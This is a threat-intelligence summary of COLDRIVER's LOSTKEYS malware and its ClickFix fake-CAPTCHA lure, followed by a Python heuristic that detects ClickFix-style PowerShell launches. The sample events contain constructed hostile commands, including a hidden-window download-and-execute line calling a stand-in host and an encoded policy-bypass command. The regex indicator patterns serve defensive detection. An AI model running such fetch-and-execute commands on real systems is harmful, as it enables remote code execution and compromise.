COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs

NetmanageIT OpenCTI - opencti.netmanageit.com



SUMMARY :

COLDRIVER, a Russian government-backed threat group, has added a new piece of malware, LOSTKEYS, to its toolset. LOSTKEYS steals files and system information from the victim's host. The group targets high-profile individuals, NGOs and former intelligence officers through credential phishing and malware delivery. LOSTKEYS arrives via a multi-step infection chain that begins with a fake CAPTCHA page in the ClickFix style: the victim is instructed to copy and run a PowerShell command, which retrieves the later stages. The chain checks whether it is running in a virtual machine, a sandbox-evasion step, and the final payload is decoded with a substitution cipher. COLDRIVER's primary goal is intelligence collection in support of Russia's strategic interests; its targets include Western governments and militaries, journalists, and individuals connected to Ukraine. The group has also been linked to hack-and-leak operations in the UK and against NGOs.
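The ClickFix entry point described above leaves a characteristic trace in process-creation telemetry: powershell.exe spawned by the interactive shell (explorer.exe, which also services the Win+R Run box the lure directs the victim to) with a command line carrying hidden-window, encoded-command, policy-bypass or download-cradle switches. The following detection heuristic is an added example, not code from the OpenCTI entry or from the reporting it summarizes. The event shape and field names (parent_image, image, command_line) are assumed, the sample records are constructed, and the "lure comment" indicator is an assumption drawn from public ClickFix reporting rather than from this page.

```python
"""Heuristic detection of ClickFix-style PowerShell launches (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed records in a Sysmon Event ID 1-like shape. Hypothetical data:
# none of these come from the page or from any real incident.
SAMPLE_EVENTS = [
    {  # ClickFix pattern: Run-box PowerShell, hidden window, download cradle, lure text
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -c "iex (irm https://verify.example/captcha)" # I am not a robot',
    },
    {  # Benign: admin runs a local script from the Start menu
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -NoProfile -File C:\Scripts\backup.ps1",
    },
    {  # Not PowerShell at all
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd /c echo hello",
    },
    {  # ClickFix variant: policy bypass plus encoded command (constructed base64)
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -nop -ep bypass -enc SQBFAFgAIABpAHIAbQAgAGgAdAB0AHAAcwA6AC8A",
    },
]

# Each indicator is one point; PowerShell's abbreviated switches are covered.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x(?:ec)?|xecutionpolicy)\s+(?:bypass|unrestricted)\b", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
        r"downloadstring|downloadfile|net\.webclient|start-bitstransfer)\b", re.I),
    # Lure text that ClickFix pages commonly have the victim paste along with the
    # command (assumption from public ClickFix reporting, not from this page).
    "lure_comment": re.compile(r"#.*\b(?:not a robot|verif(?:y|ication)|captcha)\b", re.I),
}


@dataclass
class Finding:
    index: int
    score: int
    reasons: list[str] = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_powershell(image: str) -> bool:
    return _basename(image) in {"powershell.exe", "pwsh.exe"}


def _is_interactive_shell(parent_image: str) -> bool:
    # explorer.exe is the parent both for Start-menu launches and for the
    # Win+R Run box, so on its own it is not suspicious; the command line is.
    return _basename(parent_image) == "explorer.exe"


def score_command_line(cmdline: str) -> list[str]:
    """Return the names of all indicators present in a command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def detect_clickfix(events: list[dict[str, str]], threshold: int = 2) -> list[Finding]:
    """Flag PowerShell launched from the interactive shell with >= threshold indicators."""
    findings: list[Finding] = []
    for i, ev in enumerate(events):
        if not (_is_powershell(ev["image"]) and _is_interactive_shell(ev["parent_image"])):
            continue
        reasons = score_command_line(ev["command_line"])
        if len(reasons) >= threshold:
            findings.append(Finding(index=i, score=len(reasons), reasons=reasons))
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {f.index}: score={f.score} reasons={', '.join(f.reasons)}")
```

A threshold of two indicators keeps an administrator who opens PowerShell from the Start menu and runs a local script out of the results while still catching both constructed lure variants. When a hit needs corroboration on the host, the Run box history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU will hold the pasted command if the victim used Win+R, which is the usual ClickFix instruction.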

OPENCTI LABELS :

powershell,phishing,credential theft,clickfix,spica,document theft,lostkeys,ngos

